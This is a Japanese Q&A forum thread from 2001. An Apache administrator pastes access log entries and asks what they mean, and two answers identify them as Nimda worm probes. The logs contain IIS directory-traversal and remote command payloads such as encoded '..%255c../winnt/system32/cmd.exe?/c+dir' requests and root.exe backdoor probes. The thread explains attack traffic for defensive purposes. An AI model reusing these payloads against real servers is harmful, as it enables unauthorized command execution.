apacheのログで3日ほど前から以下の様なアクセスが
いろいろなIPアドレスから来るのですが
何をやろうとしているのでしょうか?

211.196.98.124 - - [20/Sep/2001:03:32:52 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 403 280
211.196.98.124 - - [20/Sep/2001:03:32:53 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 278
211.196.98.124 - - [20/Sep/2001:03:32:53 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 288
211.196.98.124 - - [20/Sep/2001:03:32:53 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 288
211.196.98.124 - - [20/Sep/2001:03:32:54 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 302
211.196.98.124 - - [20/Sep/2001:03:32:54 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 319
中略
211.196.98.124 - - [20/Sep/2001:03:32:57 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
211.196.98.124 - - [20/Sep/2001:03:32:58 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 302
211.196.98.124 - - [20/Sep/2001:03:32:58 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 302

なんとなくdirコマンドでCドライブの内容を調べようとしているのはわかるのですが…
環境はWinNT4.0sp4 apache 1.3.20です。

あと、エラーコード(?)の403と404は知っているのですが
400はどういう意味なのでしょうか?

また何か問題はあるのでしょうか?

このQ&Aに関連する最新のQ&A

A 回答 (2件)

NIMDAのアタックログです。


ですがIISのセキュリティホールを狙ったものですので、
Apacheには感染の危険性はありません。
IISには大ざっぱに言うと、とあるセキュリティホールを
突くと、Webディレクトリからシステムディレクトリへ侵入するという
大穴があります。上記はそれを狙ったもので、『root.exe』を
リクエストしているのは、もしそのIISがCodeRedに感染していた
場合は、そのバックドアを利用して侵入を図ろう、というものです。
(ちなみに、次回はIPは伏せた方が良いと思いますよ。)
    • good
    • 0

おそらくNIMDAウイルスが侵入しようとした跡でしょう。


詳細はGooニュース
http://channel.goo.ne.jp/news/mycom/it/20010920/ …
を参照してください。

400 -Bad Request は「間違ったURLを入力したのでサーバが理解できなかった」です。
    • good
    • 0

このQ&Aに関連する人気のQ&A

お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!


人気Q&Aランキング